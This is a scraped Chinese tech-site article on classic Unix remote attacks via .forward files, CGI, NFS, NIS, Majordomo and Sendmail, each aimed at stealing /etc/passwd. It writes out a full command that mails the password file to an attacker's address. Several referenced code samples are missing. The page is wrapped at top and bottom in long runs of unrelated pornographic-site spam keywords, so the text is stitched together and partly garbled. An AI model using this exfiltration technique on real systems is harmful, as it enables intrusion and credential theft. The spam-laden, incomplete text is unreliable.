国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

實現遠程攻擊的幾種方法

運維 系統運維
如果匿名FTP主目錄可寫,可以寫一個".forward"文件;文件內容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉發的。

如果匿名FTP主目錄可寫,可以寫一個".forward"文件;文件內容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉發的。如果某一用戶(此處為FTP)的主目錄下有這個文件時,那么,當該用戶收到郵件時,就要視".forward"的內容進行轉發:如果".forward"的內容為一些電子郵件地址,該郵件就被轉發到這些地址;而如果為一行用雙引號引起來的Shell命令,則該郵件的內容被重定向到此命令。此處,命令為:"|/bin/cat/etc/passwd|sed's/^//'|/bin/mail me@my.e-mail.addr",實際上對重定向過來的作為輸入的郵件內容沒有做任何處理,而是把/etc/passwd(為了防止被安全機制過濾,先在每一行行首增加一個空格)發到了攻擊者的電子郵件地址(me@my.e-mail.addr)。因此。在有這樣一個".forward"文件后,再隨便發一封電子郵件給victim.cor上的FTP用戶,通過這種"轉發"功能,victim.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上來了。

WWW攻擊

很多WWW服務器都有預裝的CGI程序,其中有些程序由于設計上的失誤,使得攻擊者可以利用它們來做一些設計者意想不到的事情,如隨意執行服務器主機上的任何命令。下面是幾個著名的Buggy CGI:

這幾種方法都可以得到目標主機上的/etc/passwd(當然,前提都是該機提供WWW服務并且cgi-bin下放有這幾種Buggy(CGI)。

NFS攻擊

如果某用戶的主目錄共享出來,嘗試如下操作:

walt的UID為10101,于是在本地創建一個名為“walt”,UID為“10101”的用戶,用su命令在本地成為這個用戶(攻擊者在本地應該是

冒充用戶walt在安裝過來的sun8.com的/users/walt下 (即walt在sun8.com上的主目錄下)放一個".forward"文件,再發一封電子郵件給該用戶,根據上面已經講過的道理,郵件轉發機制就會把sun8.com的/etc/passwd文件郵寄給攻擊者了。

Sniffer攻擊

由于大多數網絡數據流是明文傳輸的,所以在廣播性質的以太網內。任何一臺主機都可以竊聽到其他主機間的任何通信包,包括用于網絡登錄用戶認證的口令。獲得用戶口令后,自然可以冒充該用戶登錄到攻擊目標上去。Sniffer的局限是:攻擊者和被攻擊者必須在同一個以太局域網內,這通常不僅意味著物理上的鄰近,而且意味著組織和部門上的鄰近,即一般攻擊者為內部人員。

NIS攻擊

NIS(Network Information System:網絡信息系統)用于網絡管理信息的共享和統一管理。一般情況下,諸如Passwd、hosts、networks、alias等系統配置信息都是分散在各臺主機上,各不相干。但實際上這些信息在同一個子網內往往是公共的,NIS即是為這些信息提供一個統一的存放地點(NIS服務器),這樣不僅可以避免重復,還容易保持這些信息的一致性。NIS又稱Yellow Page,故其命令都以yp-開頭;后來又有新的NIS+,其命令改成以nis-開頭。

這類攻擊會先猜測域名,然后用ypcat(或對于NIS+:niscat)可獲得passwd(甚至shadow)頂用NIS后,用戶口令信息從NIS服務器上獲取。若能控制NIS服務器,就可以創建郵件別名。

假設攻擊者控制了NIS服務器,在該服務器上建立一個名叫"foo"的別名,則這個別名為該NIS域內所有的主機共享,其中包括攻擊目標victim.com,所以當攻擊者發一封信到foo@victim.com時,victim.com就從NIS服務器取得別名"foo"的定義,即:把victim.com上的/etc/passwd文件發送到攻擊者的電子郵件地址。

E-mail攻擊

電子郵件看上去好像是一種最無害的網絡服務,但在黑客看來,每個開向網絡的窗口都可能成為通向系統的大門。以下是一個利用majordomo(ver.1.94.3)漏洞的例子。

Majordomo是一種電子郵寄列表(Mailing list)服務器,所謂Mailing list是服務器維護著的一張電子郵件地址的表,服務器負責把所有發向該列表的信件轉發到列表中的每個電子郵件地址。這樣就可以形成一個虛擬的公共場所。在其中,每個人的聲音都可以被所有其他的人聽到。Majordomo被全世界眾多的Mailing list廣泛使用,其特定版本V.1.94.3中有一個漏洞,黑客可以利用這個漏洞在目標機上運行任何Shell腳本,方法是把這個腳本放在自己的Home目錄下,并保證本地機允許目標機用RCP拷貝這個腳本,然后向該郵件列表發一封電子郵件,在Reply-to域中鍵入上列的字符串。

如果腳本內容如上所示,則該Majornomo程序將會把目標上的/etc/passwd寄給攻擊者。

Sendmail攻擊

利用Sendmail 5.55的漏洞攻擊如下:

效果類似,會得到victim.com的passwd文件。再接著利用/etc/aliases,pag。aliases.pag是/etc/aliases編譯后的形態。在許多系統中這個文件是對所有人可寫的(World-writable)。

本地的uuencode程序生成一個編碼流,文件名為'etc/aliases.pag",內容與本地decode相同,并作為電子郵件發給victim.com上的decode別名,victim.com收到該郵件后,把這個編碼流重定向到解碼程序uudecode,uudecode則恢復文件內容。并試圖把它存為/etc/aliases.pag;如果daemon對/etc/aliases.pag有寫權限,則改寫成功,于是victim.com上獻出現一個別名"bin"——它所做的正是發送攻擊者需要的passwd文件到其電子郵箱。

責任編輯:符甲 來源: 中國IT實驗室
相關推薦

2009-09-18 13:36:10

2010-04-30 16:22:07

Unix終端

2009-09-09 11:24:46

PHP實現MVC

2023-04-13 15:56:35

2009-06-09 11:19:49

2024-06-03 08:26:34

Android開發監聽器

2021-06-08 11:42:12

Pandas數據分析Python

2018-02-08 09:04:58

Nginx404頁面方法

2013-08-21 11:31:21

iPhone圖片方法

2010-06-03 08:55:43

LINQ

2010-05-17 15:17:06

MySQL常用操作

2023-02-03 10:38:07

2020-08-24 08:05:47

JavaScriptJavaScript 頁面

2021-02-26 13:20:48

Shell空行Linux

2011-06-16 10:48:33

session

2020-01-10 16:23:44

Springboot停止服務Java

2009-08-31 09:19:31

c#隱藏窗口

2010-10-26 09:23:03

Web Service

2010-01-22 14:46:25

C++語言

2021-03-08 09:32:04

Python文件命令
點贊
收藏

51CTO技術棧公眾號

午夜精品视频在线观看| 韩国中文字幕av| 99视频在线观看地址| 免费成人在线影院| 国产精品女视频| 免费观看一级欧美片| 欧美丝袜一区二区三区| 99精品在线免费视频| 国产日韩精品视频一区二区三区| 91精品国产91久久| 久久久久久香蕉| 在线亚洲一区| 手机成人在线| 亚洲有码转帖| 西瓜成人精品人成网站| 三级视频网站在线| 国产精品久久久久久久久久直播| 国产精品一 二 三| av在线电影播放| 欧美一区综合| 国产美女性感在线观看懂色av| 国产伦视频一区二区三区| 亚洲kkk444kkk在线观看| 一区二区网站| 日韩有码一区二区三区| 日本一区二区动态图| 亚洲视频一二三区| 久久亚洲精品一区| 一级二级在线观看| 久久精品国产网站| 成人欧美一区二区三区黑人免费| 精品伊人久久久| 欧美大胆a视频| 亚洲一级片网站| 成人性视频网站| 欧美狂野激情性xxxx在线观| 日韩精品第二页| 亚洲三级电影网站| 日韩精品一区中文字幕| 91原创在线视频| 男的插女的下面视频| 国产成人精品免费视频网站| 国产又粗又大又爽的视频| av免费观看久久| 国产www视频在线观看| 国产伦理精品不卡| 精品国产区在线| 一区二区视频国产| 成人自拍视频网| 亚洲欧洲99久久| 欧美伦理视频在线观看| 日韩精品社区| 91精品国产高清久久久久久91| 一区二区三区四区高清视频 | 国产直播在线| 69p69国产精品| 北岛玲日韩精品一区二区三区| 国产探花在线精品| 久久99热精品| 成人精品毛片| 在线成人免费视频| 综合久久2o19| 久久久久高清精品| 污色网站在线观看| 亚洲精品高清在线观看| 日本精品一区二区三区视频| 美女视频一区免费观看| 日本三级福利片| 2021国产精品久久精品| 99国产视频| 欧美综合二区| 日韩jizzz| 亚洲欧洲国产日本综合| 五月天亚洲激情| 国产高清久久| 亚洲欧美欧美一区二区三区| 欧美在线观看视频| 欧美亚洲高清| 精品1区2区在线观看| 国产极品模特精品一二| 青青草99啪国产免费| 欧美在线播放高清精品| 成人黄色av网站| 麻豆理论在线观看| 久久精品国产亚洲精品| 视频精品一区二区三区| 色婷婷久久综合| 福利一区福利二区微拍刺激| 欧美性受xxxx黑人猛交88| 久久精品av| 亚洲美女福利视频网站| 98色花堂精品视频在线观看| 国产精品少妇自拍| 国产亚洲欧美色| 国产一二三区在线视频| 最近2019年日本中文免费字幕 | 久久免费国产精品| 成人中文字幕在线播放| 夜夜嗨av一区二区三区网页| 亚洲综合中文字幕在线观看| av成人免费看| 在线成人午夜影院| 四虎精品在线观看| 亚洲最大成人在线| 成人黄页在线观看| 在线麻豆国产传媒1国产免费| 日韩精品专区在线影院观看| 国产suv精品一区| 久久综合九色欧美狠狠| 国产女人aaa级久久久级| 永久免费在线看片视频| 亚洲天堂精品在线观看| 蜜桃麻豆影像在线观看| 91久久久久久久一区二区| 成人毛片老司机大片| 成人福利在线| 2021久久精品国产99国产精品| 国产成人77亚洲精品www| 欧美激情第一页xxx| 一区二区三区四区在线播放| 少妇av在线| 51ⅴ精品国产91久久久久久| 亚洲精选91| 色豆豆成人网| 888久久久| 免费黄色日本网站| 欧美黄色一级| 日韩高清在线电影| xxx国产在线观看| 亚洲va天堂va国产va久| 国产视频精选在线| 亚洲激情视频网站| 91在线中文| 亚洲国产精品久久| 国产一区二区高清不卡| 国产精欧美一区二区三区| 首页综合国产亚洲丝袜| 三上悠亚在线观看| 欧美成人小视频| 风间由美性色一区二区三区| 欧美精品videos另类| 91社区国产高清| 亚洲精品日韩专区silk| 一区三区自拍| 欧美精品一区免费| 亚洲天堂久久av| 国产乱码精品一区二区三| 四虎亚洲精品| 欧美日韩在线观看一区二区三区| 色婷婷激情一区二区三区| 欧美欧美黄在线二区| 奇米777影视成人四色| 欧美激情第99页| 国产欧美久久久精品影院| 日本一区二区三区中文字幕| 国产亚洲黄色片| 成人小视频在线观看| 黄色在线看片| 亚洲高清资源综合久久精品| 日韩久久免费av| 麻豆成人在线观看| 麻豆理论在线观看| 日本高清视频免费在线观看| 亚洲天堂影视av| 99久久久免费精品国产一区二区| 色婷婷成人在线| 欧美国产日本高清在线| 国产欧美一区二区在线观看| 99久久婷婷国产综合精品青牛牛| 免费激情视频在线观看| 欧美精品生活片| 国产精品国产三级国产a| 九色精品91| 日韩精品福利| 久久国产欧美精品| 99r精品视频| 精品三级在线看| 飘雪影视在线观看免费观看| 91免费版黄色| 欧美男女性生活在线直播观看| 99热免费精品在线观看| 91产国在线观看动作片喷水| 免费成人动漫| 黄色片视频在线免费观看| 97精品国产aⅴ7777| 亚洲九九视频| 色天堂在线视频| 国产精品永久入口久久久| 5858s免费视频成人| 国产河南妇女毛片精品久久久 | 成年人视频网站| 国产精品情侣自拍| 欧美日产国产精品| 黄色网一区二区| 国产香蕉视频在线观看| 国产在线精品一区| 国产午夜精品全部视频播放| 亚洲色图清纯唯美| 久久综合九色| 国产96在线亚洲|